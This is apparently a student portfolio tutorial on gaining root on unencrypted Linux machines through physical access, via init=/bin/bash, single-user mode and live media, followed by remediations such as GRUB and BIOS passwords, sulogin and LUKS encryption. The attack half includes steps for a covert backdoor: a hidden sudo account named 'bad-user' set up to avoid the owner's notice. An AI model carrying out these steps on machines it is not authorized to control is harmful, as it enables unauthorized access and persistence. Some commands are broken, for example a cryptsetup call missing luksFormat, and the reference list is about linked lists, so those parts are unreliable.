Breaking into Linux systems:

Breaking into Linux systems:

Objectives

To explore the various methods of breaking into any Linux system without FDE (Full Disk Encryption) through physical access.
To examine the procedure of setting up FDE and other remediations to prevent this.

Prerequisites

Physical access to the target machine
~60 seconds

Procedure

Method 1: Using /sbin/init to execute a shell

Init is a process started during bootup that initializes a system. It starts, stops and monitors essential service processes during bootup and shutdown. I will use it to execute a root shell after booting the target system.

Power on/reboot the target machine
1. Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
3. If all else fails, press the Reset button or power cycle the target machine.
Press/hold the <Escape> key as soon as you see the GRUB splash screen.
At the grub prompt, press 'e' to edit
While still inside grub, add “init=/bin/bash” to the end of the “kernel” line:
```
kernel=/vmlinuz-<version> [...parameters...] init=/bin/bash
```
Continue booting.

DONE! THAT'S ALL FOLKS!
After the target machine finishes booting, the kernel will detect the hardware and immediately drop you into a root shell. Since the system initialization script '/etc/rc.d/rc.sysinit' was bypassed and NOT executed, you need to remount the root file system to make the system more usable:

Mount the /proc file system:
```
mount /proc
```
You will see an error message complaining that it was already mounted. Ignore it.
Remount the root file system in read-write mode:
```
mount -o remount,rw /
```
Depending on how the target's file system is laid out, you may need to mount some other file systems. Lets view the file system table:
```
cat /etc/fstab
```
Mount any other needed file systems (Like '/home', '/usr', etc.).
Do whatever nefarious things you want:
1. Change the root account password:
```
passwd root
```
2. PROTIP: I don't recommend doing this. The next time the real user logs into the system they will notice that the root password has been changed and it's GAME OVER. We need to be super sneaky, secretive, and surreptitious so here's something a little less noticeable:
  1. Simply add another user without modifying the original root password:
```
adduser -D -u 1000 bad-user
passwd bad-user
```
  2. Now add the newly created user to the sudoers file. This is also not as noticable as changing the actual root password:
```
vi /etc/sudoers
bad-user ALL=(ALL) ALL
```
Reboot the target machine to make any changes to the file system persistent.
1. Flush any disk I/O to the hardware:
```
sync
```
2. Unmount any mounted file systems in reverse order:
```
umount
```
Reboot with either <Ctrl><Alt><Del> or the power switch.

Method 2: boot to single-user mode

Single user mode is a start-up mode that boots a multi-user operating system into single superuser. It is often used for diagnoses and triage of a broken or malware-infected system. After booting into single-user mode, a root shell is provided to the user.

Power on/reboot the target machine
1. Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
3. If all else fails, press the Reset button or power cycle the target machine.
Press/hold the <Escape> key as soon as you see the GRUB splash screen.
At the grub prompt, press 'a' to modify the kernel parameters.
Add a space and the letter 'S' (lower or upper case) to the end of the kernel parameters line:
```
kernel=/vmlinuz-version ro root=LABEL=/ [...other-parameters...] S
```
1. Sometimes there may still be some mysterious failures in single-user mode, because of Security-Enhanced Linux policy enforcement. In that case, add another boot parameter before the 'S':
```
enforcing=0
```
Now press <Enter> to boot with the newly added parameter.

Method 3: Boot a LiveCD/USB Key/initramfs OS

LiveCD

Power off the target machine
1. Through a graphical login screen: for a clean reboot just use the shutdown options in the system menu.
2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
3. If all else fails, press the Reset button or power cycle the target machine.
Press/hold the <Escape> key to enter BIOS/UEFI
Insert any live CD and boot the system.
Once it boots, login to the LiveCD OS and get a terminal. Become root with
```
su -
```
and mount the file systems as needed.

Remediation Methods

Method 1: BIOS Password

Reboot the system and go into the BIOS. Disable booting from anything other than the main disk.
Set a BIOS password. This prevents unauthorized changes to the BIOS settings without a password.
Set a BIOS Power On password. Now the machine will require a password before powering on.

Method 2: GRUB Password

In one terminal, run:
```
 # grub-md5-crypt
```
and follow the directions.
In another terminal, edit the GRUB configuration file inside the '/boot/grub' named either 'menu.lst' or 'grub.conf'.

Add a new line directly below the 'timeout' line:

# ... comments above ...
default=0
timeout=5
password --md5 5f3782baec534bae412c27fc0850fc6d
spashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
......

Now Change the file permissions to prevent viewing and recovery of the GRUB password:
Now if you needed to legitimately break into your own machine, you need to press P while inside GRUB to enter the password to edit the boot parameters.

Method 3: single-user mode sulogin

Find where your system has its program sulogin with this command:

# which sulogin

This will force users to enter the root password to get a shell when booting into single-user mode. This is done by requiring sulogin to get into single-user mode.
1. To have the system boot up to its default run state (with the login prompt) type <Ctrl-D>
This remedy depends on what is running; traditional init, Upstart or systemd
Look at your file a/etc/inittaba and see if it contains a line specifying the sysinit action.
1. If that file contains a line similar to:
```
si::sysinit:/etc/rc.d/rc.sysinit
```
  then you have traditional init.
2. In this case, leave that line alone and add a new line:
```
# System initialization
si::sysinit:/etc/rc.d/rc.sysinit
ss:S:respawn:/sbin/sulogin	# added line
```
3. If that file is mostly comments with just one line specifying initdefault or even missing, and you have a directory /etc/init, then you have Upstart for init. In this case:
  1. If /etc/sysconfig/init exists, modify '/etc/sysconfig/init' and change:
```
SINGLE=/sbin/sushell
```
    to this:
```
SINGLE=/sbin/sulogin
```
  2. If there is no '/etc/sysconfig/init', this file (located in /etc/init/rcS.conf) prevents the booting to single-user mode:
```
start on runlevel S
stop on runlevel [!S]
 
console owner
script
    if [ -x /usr/share/recovery-mode/recovery-menu ]; then
        exec /usr/share/recovery-mode/recovery-menu
    else
        exec /sbin/sulogin
    fi
end script
 
[...]
```

Full Disk Encryption

Loop Device

A small file named crypt will be created and used to store cryptographic keys needed for booting, hdd encryption, ssh, etc.

# create empty file 'crypt'
dd if=/dev/zero of=/crypt bs=1M count=256
# create device node
losetup /dev/loop0 /crypt
# setup LUKS header
cryptsetup -c aes-xts-plain64 --key-size 512 \
	--hash sha512 --iter-time 5000 \
	--use-urandom luksFormat /dev/loop0
# open file
cryptsetup open /dev/loop0 crypt
# create filesystem
mkfs.ext4 /dev/mapper/crypt
# create mountpoint
mkdir /mnt/crypt
# mount file
mount -t ext4 /dev/mapper/crypt /mnt/crypt
 
...
 
# unmount file
umount /mnt/crypt
# delete mountpoint
rmdir /mnt/crypt
# close file
cryptsetup close crypt
# delete device node
losetup -d /dev/loop0

Entire Partition

Note: /dev/sdb1 will be used as the test partition, 'private' will be its name.

# Create partition 
cryptsetup -c aes-xts-plain64 \
	--key-size 512 --hash sha512 \
	--iter-time 5000 --use-urandom /dev/sdb1
# open volume onto device mapper
cryptsetup open /dev/sdb1 private
# create filesystem
mkfs.ext4 /dev/mapper/private
# open mapped device
cryptsetup --type luks open /dev/sdb1 private
# mount encrypted partition
mount -t ext4 /dev/mapper/private /mnt/private
 
...
 
# unmount
umount /dev/sdb1
# close mapped device
cryptsetup close private

References

In performing this project, the following resources were referenced:

Google: Of course Google was used, it knows everything. No particular page from Google was used, It was mainly used for information about the project (Linked Lists in general): http://www.google.com/; If ya don't know, now ya know, and knowing is half the battle.

Wikipedia: Has a great article on Linked Lists; Tons of information, pretty pictures, and some code: http://en.wikipedia.org/wiki/Linked_list.

Back to my Portfolio

Table of Contents